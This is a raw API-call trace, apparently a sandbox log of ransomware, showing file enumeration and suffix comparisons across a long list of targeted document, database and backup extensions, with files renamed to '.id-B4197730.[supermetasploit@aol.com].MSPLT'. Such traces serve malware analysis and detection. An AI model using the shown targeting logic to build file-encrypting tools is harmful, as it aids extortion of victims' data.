[0283.283] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0283.283] lstrlenW (lpString=".pict") returned 5 [0283.283] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0283.283] lstrlenW (lpString=".pl") returned 3 [0283.283] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0283.283] lstrlenW (lpString=".pls") returned 4 [0283.283] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0283.283] lstrlenW (lpString=".pm") returned 3 [0283.283] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0283.283] lstrlenW (lpString=".png") returned 4 [0283.283] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0283.283] lstrlenW (lpString=".pnm") returned 4 [0283.283] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0283.283] lstrlenW (lpString=".pot") returned 4 [0283.283] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0283.283] lstrlenW (lpString=".potm") returned 5 [0283.283] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0283.283] lstrlenW (lpString=".potx") returned 5 [0283.283] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0283.283] lstrlenW (lpString=".ppa") returned 4 [0283.283] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0283.283] lstrlenW (lpString=".ppam") returned 5 [0283.283] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0283.283] lstrlenW (lpString=".ppm") returned 4 [0283.284] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".pps") returned 4 [0283.284] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".ppsm") returned 5 [0283.284] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0283.284] lstrlenW (lpString=".ppt") returned 4 [0283.284] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".pptm") returned 5 [0283.284] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0283.284] lstrlenW (lpString=".pptx") returned 5 [0283.284] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0283.284] lstrlenW (lpString=".prn") returned 4 [0283.284] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".ps") returned 3 [0283.284] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0283.284] lstrlenW (lpString=".psb") returned 4 [0283.284] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".psd") returned 4 [0283.284] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".pst") returned 4 [0283.284] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".ptx") returned 4 [0283.284] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".pub") returned 4 [0283.284] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0283.284] lstrlenW (lpString=".pwm") returned 4 [0283.284] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0283.285] lstrlenW (lpString=".pxr") returned 4 [0283.285] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0283.285] lstrlenW (lpString=".py") returned 3 [0283.285] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0283.285] lstrlenW (lpString=".qt") returned 3 [0283.285] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0283.285] lstrlenW (lpString=".r3d") returned 4 [0283.285] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0283.285] lstrlenW (lpString=".raf") returned 4 [0283.285] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0283.285] lstrlenW (lpString=".rar") returned 4 [0283.285] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0283.285] lstrlenW (lpString=".raw") returned 4 [0283.285] lstrcmpiW (lpString1=".raw", lpString2="SPLT") returned -1 [0283.285] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58e6ddfa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58e6ddfa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="GetCurrentRollback.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="GETCUR~1.MSP")) returned 1 [0283.285] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59bfd465, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59bfd465, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="PartnerSetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 1 [0283.285] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x595baff0, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x595baff0, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x595e1236, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="preoobe.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PREOOB~1.MSP")) returned 1 [0283.286] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59bb102a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59bb102a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59bd710c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="SetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPC~1.MSP")) returned 1 [0283.286] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59bb102a, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59bb102a, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59bd710c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x236, dwReserved0=0xffffe3c4, dwReserved1=0x2e8, cFileName="SetupComplete.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPC~1.MSP")) returned 0 [0283.288] FindClose (in: hFindFile=0x48a130 | out: hFindFile=0x48a130) returned 1 [0283.298] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3880058 | out: hHeap=0x470000) returned 1 [0283.298] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x58e96aba, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0283.298] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.298] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.300] FindNextFileW (in: hFindFile=0x48a830, lpFindFileData=0x2e8fcf8 | out: lpFindFileData=0x2e8fcf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77b20000, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0283.300] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.300] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.301] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0283.301] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x58e6ddfa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e6ddfa, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0283.301] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3880058 [0283.301] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x16, ftLastAccessTime.dwLowDateTime=0x2, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0xba, dwReserved0=0xffffddcd, dwReserved1=0xbc, cFileName="￿㨀Ёǿ", cAlternateFileName="鉠M\x08")) returned 0xffffffff [0283.302] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x3880058 | out: hHeap=0x470000) returned 1 [0283.302] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="S-1-5-21-1051304884-625712362-2192934891-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0283.302] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x3880058 [0283.302] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1051304884-625712362-2192934891-1000\\*", lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddcd, dwReserved1=0xbc, cFileName=".", cAlternateFileName="")) returned 0x48a270 [0283.302] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcb9438a8, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffddcd, dwReserved1=0xbc, cFileName="..", cAlternateFileName="")) returned 1 [0283.302] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf55a58a9, ftCreationTime.dwHighDateTime=0x1d60985, ftLastAccessTime.dwLowDateTime=0xf55a58a9, ftLastAccessTime.dwHighDateTime=0x1d60985, ftLastWriteTime.dwLowDateTime=0xf55a58a9, ftLastWriteTime.dwHighDateTime=0x1d60985, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0xffffddcd, dwReserved1=0xbc, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0283.303] FindNextFileW (in: hFindFile=0x48a270, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x593a4fb8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x593a4fb8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x593cb2af, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x17a, dwReserved0=0xffffddcd, dwReserved1=0xbc, cFileName="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="DESKTO~1.MSP")) returned 1 [0283.303] lstrlenW (lpString="desktop.ini.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 55 [0283.303] lstrlenW (lpString=".1cd") returned 4 [0283.303] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0283.303] lstrlenW (lpString=".3ds") returned 4 [0283.303] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0283.303] lstrlenW (lpString=".3fr") returned 4 [0283.303] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0283.303] lstrlenW (lpString=".3g2") returned 4 [0283.303] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0283.303] lstrlenW (lpString=".3gp") returned 4 [0283.303] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0283.303] lstrlenW (lpString=".7z") returned 3 [0283.303] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0283.303] lstrlenW (lpString=".accda") returned 6 [0283.303] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0283.304] lstrlenW (lpString=".accdb") returned 6 [0283.304] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0283.304] lstrlenW (lpString=".accdc") returned 6 [0283.304] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0283.304] lstrlenW (lpString=".accde") returned 6 [0283.304] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0283.304] lstrlenW (lpString=".accdt") returned 6 [0283.304] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0283.304] lstrlenW (lpString=".accdw") returned 6 [0283.304] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0283.304] lstrlenW (lpString=".adb") returned 4 [0283.304] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".adp") returned 4 [0283.304] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".ai") returned 3 [0283.304] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0283.304] lstrlenW (lpString=".ai3") returned 4 [0283.304] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".ai4") returned 4 [0283.304] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".ai5") returned 4 [0283.304] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".ai6") returned 4 [0283.304] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".ai7") returned 4 [0283.304] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".ai8") returned 4 [0283.304] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0283.304] lstrlenW (lpString=".anim") returned 5 [0283.305] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0283.305] lstrlenW (lpString=".arw") returned 4 [0283.305] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0283.305] lstrlenW (lpString=".as") returned 3 [0283.305] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0283.305] lstrlenW (lpString=".asa") returned 4 [0283.305] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0283.305] lstrlenW (lpString=".asc") returned 4 [0283.305] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0283.305] lstrlenW (lpString=".ascx") returned 5 [0283.305] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0283.305] lstrlenW (lpString=".asm") returned 4 [0283.305] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0283.305] lstrlenW (lpString=".asmx") returned 5 [0283.305] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0283.305] lstrlenW (lpString=".asp") returned 4 [0283.305] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0283.305] lstrlenW (lpString=".aspx") returned 5 [0283.305] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0283.305] lstrlenW (lpString=".asr") returned 4 [0283.305] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0283.305] lstrlenW (lpString=".asx") returned 4 [0283.305] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0283.305] lstrlenW (lpString=".avi") returned 4 [0283.306] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".avs") returned 4 [0283.306] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".backup") returned 7 [0283.306] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0283.306] lstrlenW (lpString=".bak") returned 4 [0283.306] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".bay") returned 4 [0283.306] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".bd") returned 3 [0283.306] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0283.306] lstrlenW (lpString=".bin") returned 4 [0283.306] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".bmp") returned 4 [0283.306] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".bz2") returned 4 [0283.306] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".c") returned 2 [0283.306] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0283.306] lstrlenW (lpString=".cdr") returned 4 [0283.306] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".cer") returned 4 [0283.306] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0283.306] lstrlenW (lpString=".cf") returned 3 [0283.306] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0283.306] lstrlenW (lpString=".cfc") returned 4 [0283.307] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".cfm") returned 4 [0283.307] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".cfml") returned 5 [0283.307] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0283.307] lstrlenW (lpString=".cfu") returned 4 [0283.307] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".chm") returned 4 [0283.307] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".cin") returned 4 [0283.307] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".class") returned 6 [0283.307] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0283.307] lstrlenW (lpString=".clx") returned 4 [0283.307] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".config") returned 7 [0283.307] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0283.307] lstrlenW (lpString=".cpp") returned 4 [0283.307] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".cr2") returned 4 [0283.307] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".crt") returned 4 [0283.307] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0283.307] lstrlenW (lpString=".crw") returned 4 [0283.307] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".cs") returned 3 [0283.308] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0283.308] lstrlenW (lpString=".css") returned 4 [0283.308] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".csv") returned 4 [0283.308] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".cub") returned 4 [0283.308] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".dae") returned 4 [0283.308] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".dat") returned 4 [0283.308] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".db") returned 3 [0283.308] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0283.308] lstrlenW (lpString=".dbf") returned 4 [0283.308] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".dbx") returned 4 [0283.308] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".dc3") returned 4 [0283.308] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".dcm") returned 4 [0283.308] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".dcr") returned 4 [0283.308] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".der") returned 4 [0283.308] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0283.308] lstrlenW (lpString=".dib") returned 4 [0283.309] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0283.309] lstrlenW (lpString=".dic") returned 4 [0283.309] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0283.309] lstrlenW (lpString=".dif") returned 4 [0283.309] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0283.309] lstrlenW (lpString=".divx") returned 5 [0283.309] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0283.309] lstrlenW (lpString=".djvu") returned 5 [0283.309] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0283.309] lstrlenW (lpString=".dng") returned 4 [0283.309] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0283.309] lstrlenW (lpString=".doc") returned 4 [0283.309] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0283.309] lstrlenW (lpString=".docm") returned 5 [0283.309] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0283.309] lstrlenW (lpString=".docx") returned 5 [0283.309] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0283.309] lstrlenW (lpString=".dot") returned 4 [0283.309] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0283.309] lstrlenW (lpString=".dotm") returned 5 [0283.309] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0283.309] lstrlenW (lpString=".dotx") returned 5 [0283.309] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0283.309] lstrlenW (lpString=".dpx") returned 4 [0283.310] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".dqy") returned 4 [0283.310] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".dsn") returned 4 [0283.310] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".dt") returned 3 [0283.310] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0283.310] lstrlenW (lpString=".dtd") returned 4 [0283.310] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".dwg") returned 4 [0283.310] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".dwt") returned 4 [0283.310] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".dx") returned 3 [0283.310] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0283.310] lstrlenW (lpString=".dxf") returned 4 [0283.310] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".edml") returned 5 [0283.310] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0283.310] lstrlenW (lpString=".efd") returned 4 [0283.310] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".elf") returned 4 [0283.310] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".emf") returned 4 [0283.310] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0283.310] lstrlenW (lpString=".emz") returned 4 [0283.310] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".epf") returned 4 [0283.311] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".eps") returned 4 [0283.311] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".epsf") returned 5 [0283.311] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0283.311] lstrlenW (lpString=".epsp") returned 5 [0283.311] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0283.311] lstrlenW (lpString=".erf") returned 4 [0283.311] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".exr") returned 4 [0283.311] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0283.311] lstrlenW (lpString=".f4v") returned 4 [0283.311] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0283.311] 